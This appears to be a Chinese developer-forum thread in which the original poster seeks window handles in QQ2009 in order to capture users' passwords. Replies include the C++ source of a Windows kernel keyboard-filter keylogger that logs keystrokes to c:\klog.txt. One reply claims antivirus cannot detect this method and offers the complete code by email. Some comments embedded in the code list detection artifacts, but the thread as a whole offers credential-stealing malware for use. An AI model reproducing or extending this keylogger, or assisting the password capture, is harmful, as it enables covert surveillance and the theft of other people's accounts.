急!!!怎么获取QQ2009的按钮句柄或者编辑框句柄???
解决方案 »
是你要的吗
不知道对不对
我就可以捕获QQ的单击事件,获取USERANDPASS了!!!
所用控件全是画上去的 还有轻量级控件
全是没有句柄的!!!!!!!!!!!!
想截获密码 我给你段源码 但是就怕你不会用 呵呵
liap_MS_Spy_pp71这是微软的
spylite24
这两个配合使用,很不错
只要你装了VS的话应该就有这个东东的。
标题:张三
类名:TXGuiFoundation
仅此而已,可见QQ2009的UI控件是自己画的,所以没有句柄,或者还有什么办法能够隐藏windows控件的句柄信息?
刚调试了个SetWindowText,能通过TXGuiFoundation修改标题,但是其他按钮没法搞。
思路建议:
假如QQ聊天窗口的尺寸是固定的(我是win7+QQ2009sp4,获得的尺寸是540*492,这应该是默认大小),可以通过“反绘图”的思路,即模拟鼠标、坐标系统等定位按钮、文本框等。
下来的问题就是窗口尺寸,如果是自己用,肯定能知道尺寸的。如果是别人,可以在程序中定义几个常见尺寸,例如各个版本的默认大小、全屏时由桌面分辨率获得等等,具体的楼主自己测试吧。ps.如果你想做自动发送消息等等等等的东东,建议用其他的工具,按键精灵,autoit..
// Klog by Clandestiny
// Email: [email protected]
//@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@extern "C"
{
#include "ntddk.h"
}#include "ntddkbd.h"
#include "Klog.h"
#include "KbdHook.h"
#include "KbdLog.h"
#include "ScanCode.h"

// Global count of "tagged" read IRPs that are still outstanding. In the code
// shown on this page it is only read: Unload prints it and polls it until it
// reaches 0. Whatever increments/decrements it lives in another file --
// presumably the IRP_MJ_READ hook (DispatchRead) and its completion routine;
// TODO confirm against KbdHook / KbdLog sources.
int numPendingIrps = 0;

/////////////////////////////////////////////////////////////////////
// DriverEntry
//
// Routine Description:
// This is the first entry point called by the system when the
// driver is loaded.
//
// Parameters:
// DriverObject - pointer to the driver object
// RegistryPath - String used to find driver parameters in the
// registry. To locate Klog look for:
// HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Klog
//
// Return Value:
// NTSTATUS - Return STATUS_SUCCESS if no errors are encountered.
// Any other indicates to the system that an error has occured.
//
// Comments:
// Must call InitializeCppRunTime() to setup the C++ runtime environment.
////@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
extern "C" NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING RegistryPath )
{
    // NOTE(review): this is the entry point of a keyboard *filter* driver that
    // records keystrokes to disk. Artifacts a defender can look for, all taken
    // from this listing:
    //   - the plaintext log file \DosDevices\c:\klog.txt (created below);
    //   - the service key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Klog;
    //   - the DbgPrint banner "Keyboard Filter Driver - DriverEntry";
    //   - an extra device object sitting in the keyboard device stack
    //     (Unload detaches from pKeyboardDevice, so an attachment exists).
    // Loading any kernel driver needs administrative rights, and 64-bit Windows
    // additionally enforces driver signing; service-install and driver-load
    // events are therefore the natural detection points.
    NTSTATUS Status = {0};
    DbgPrint("Keyboard Filter Driver - DriverEntry\nCompiled at " __TIME__ " on " __DATE__ "\n");
    /////////////////////////////////////////////////////////////////////////////////////////
    // Fill in IRP dispatch table in the DriverObject to handle I/O Request Packets (IRPs)
    /////////////////////////////////////////////////////////////////////////////////////////
    // For a filter driver, we want pass down ALL IRP_MJ_XX requests to the driver which
    // we are hooking except for those we are interested in modifying.
    for(int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
        pDriverObject->MajorFunction[i] = DispatchPassDown;
    DbgPrint("Filled dispatch table with generic pass down routine...\n");
    //Explicitly fill in the IRP's we want to hook
    // Only IRP_MJ_READ is redirected; DispatchRead is defined in another file.
    pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead;
    //Go ahead and hook the keyboard now
    // HookKeyboard is not shown on this page; presumably it creates this
    // driver's device object and attaches it to the keyboard stack (TODO confirm).
    // Its result is not checked here.
    HookKeyboard(pDriverObject);
    DbgPrint("Hooked IRP_MJ_READ routine...\n");
    //Set up our worker thread to handle file writes of the scan codes extracted from the
    //read IRPs
    // InitThreadKeyLogger is not shown on this page; its result is not checked here.
    InitThreadKeyLogger(pDriverObject);
    //Initialize the linked list that will serve as a queue to hold the captured keyboard scan codes
    // Assumes pDriverObject->DeviceObject is non-NULL at this point, i.e. that
    // HookKeyboard succeeded in creating a device -- nothing here verifies it.
    PDEVICE_EXTENSION pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;
    InitializeListHead(&pKeyboardDeviceExtension->QueueListHead);
    //Initialize the lock for the linked list queue
    KeInitializeSpinLock(&pKeyboardDeviceExtension->lockQueue);
    //Initialize the work queue semaphore
    // Initial count 0, limit MAXLONG: Unload later releases it once to wake the worker.
    KeInitializeSemaphore(&pKeyboardDeviceExtension->semQueue, 0 , MAXLONG);
    //Create the log file
    // The path is hard-coded, which makes it a stable host indicator for this sample.
    IO_STATUS_BLOCK file_status;
    OBJECT_ATTRIBUTES obj_attrib;
    CCHAR ntNameFile[64] = "\\DosDevices\\c:\\klog.txt";
    STRING ntNameString;
    UNICODE_STRING uFileName;
    RtlInitAnsiString( &ntNameString, ntNameFile);
    // TRUE = allocate the destination buffer; it is released by RtlFreeUnicodeString below.
    RtlAnsiStringToUnicodeString(&uFileName, &ntNameString, TRUE );
    InitializeObjectAttributes(&obj_attrib, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
    // FILE_OPEN_IF opens the file if it already exists and creates it otherwise;
    // the handle is stored in the device extension and closed in Unload.
    Status = ZwCreateFile(&pKeyboardDeviceExtension->hLogFile,GENERIC_WRITE,&obj_attrib,&file_status,
                          NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0);
    RtlFreeUnicodeString(&uFileName);
    // A failure to open the log file is only reported via DbgPrint; the function
    // still returns STATUS_SUCCESS at the end, so the driver stays loaded.
    if (Status != STATUS_SUCCESS)
    {
        DbgPrint("Failed to create log file...\n");
        DbgPrint("File Status = %x\n",file_status);
    }
    else
    {
        DbgPrint("Successfully created log file...\n");
        DbgPrint("File Handle = %x\n",pKeyboardDeviceExtension->hLogFile);
    }
    // Set the DriverUnload procedure
    pDriverObject->DriverUnload = Unload;
    DbgPrint("Set DriverUnload function pointer...\n");
    DbgPrint("Exiting Driver Entry......\n");
    return STATUS_SUCCESS;
}
//@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
// Generic dispatch routine installed by DriverEntry for every major function it
// does not hook: the IRP is forwarded unchanged to the device stored in this
// filter's device extension (pKeyboardDevice).
//
// Parameters:
//   pDeviceObject - this driver's device object; its DeviceExtension is cast to
//                   PDEVICE_EXTENSION to find the target device.
//   pIrp          - the request to forward.
//
// Return Value:
//   Whatever IoCallDriver returns for the forwarded IRP.
//
// NOTE(review): because everything except the hooked request is passed straight
// through, the keyboard keeps working normally while this filter is loaded; the
// visible traces are the DbgPrint output emitted on each call and the extra
// device in the keyboard stack, not any change in input behaviour.
NTSTATUS DispatchPassDown(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp )
{
    DbgPrint("Entering DispatchPassDown Routine...\n");
    //pass the irp down to the target without touching it
    // Skipping the stack location means this driver sets no completion routine for the IRP.
    IoSkipCurrentIrpStackLocation(pIrp);
    return IoCallDriver(((PDEVICE_EXTENSION) pDeviceObject->DeviceExtension)->pKeyboardDevice ,pIrp);
}//end DriverDispatcher
//@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
// DriverUnload routine (registered in DriverEntry): detaches the filter from the
// keyboard device, waits for outstanding tagged IRPs, stops the worker thread,
// closes the log file and deletes the device object.
//
// Parameters:
//   pDriverObject - this driver's driver object; its first DeviceObject carries
//                   the PDEVICE_EXTENSION used throughout.
//
// NOTE(review): the wait loop below has no upper bound -- it spins for as long as
// numPendingIrps stays above 0 -- and a reply further down this thread reports
// that unloading this driver frequently ends in a bugcheck. For incident
// response that means an unload attempt on a live system is risky; capture
// memory and the c:\klog.txt artifact before trying to remove the driver.
VOID Unload( IN PDRIVER_OBJECT pDriverObject)
{
    //Get the pointer to the device extension
    PDEVICE_EXTENSION pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;
    DbgPrint("Driver Unload Called...\n");
    //Detach from the device underneath that we're hooked to
    IoDetachDevice(pKeyboardDeviceExtension->pKeyboardDevice);
    DbgPrint("Keyboard hook detached from device...\n");
    ///////////////////////////////////////////////////////////////
    //Wait for our tagged IRPs to die before we remove the device
    ///////////////////////////////////////////////////////////////
    DbgPrint("There are %d tagged IRPs\n",numPendingIrps);
    DbgPrint("Waiting for tagged IRPs to die...\n");
    //Create a timer
    KTIMER kTimer;
    LARGE_INTEGER timeout;
    timeout.QuadPart = 1000000; //.1 s
    KeInitializeTimer(&kTimer);
    // Polls the global counter; nothing in this function changes it, so the loop
    // only ends when code elsewhere (not shown) brings it down to 0.
    while(numPendingIrps > 0)
    {
        //Set the timer
        KeSetTimer(&kTimer,timeout,NULL);
        KeWaitForSingleObject(&kTimer,Executive,KernelMode,false ,NULL);
    }
    //Set our key logger worker thread to terminate
    pKeyboardDeviceExtension ->bThreadTerminate = true;
    //Wake up the thread if its blocked & WaitForXXX after this call
    KeReleaseSemaphore(&pKeyboardDeviceExtension->semQueue,0,1,TRUE);
    //Wait till the worker thread terminates
    DbgPrint("Waiting for key logger thread to terminate...\n");
    // pThreadObj is set outside this listing -- presumably by InitThreadKeyLogger (TODO confirm).
    KeWaitForSingleObject(pKeyboardDeviceExtension->pThreadObj,
                          Executive,KernelMode,false,NULL);
    DbgPrint("Key logger thread termintated\n");
    //Close the log file
    ZwClose(pKeyboardDeviceExtension->hLogFile);
    //Delete the device
    IoDeleteDevice(pDriverObject->DeviceObject);
    DbgPrint("Tagged IRPs dead...Terminating...\n");
    return;
}
明眼人一眼就知道这是什么了 呵呵 你看懂了吗?? csdn有多少人能看懂呢? 我真想知道
这驱动挂的那么上层,一点用都没用。unload这样写卸载驱动的时候蓝屏就是家常便饭了,最后一个irp包居然这样处理
1.加载驱动
2.拦截irp
3.写入文件
就这样 详细的代码 你要吗? 我这有 你说个邮箱
不过 这段代码 没有第三步的代码 这个要你自己写 我是不会
其实 主要就是windows ring0层操作 不知道你研究过没有 这个方法最大的好处就是 杀软杀不出 截获成功率高
行看来还是很多高手啊~~~~~
FindWindow ("classname", "caption")
和 FindWindowEx (hParent, NULL, "EDIT", NULL)
以及FindWindowEx (hParent, hNextChild, "EDIT", NULL)来获取你要的编辑框,
此处 "EDIT"只是实例而已,具体,你可以摸索,已经有这么多的关键词了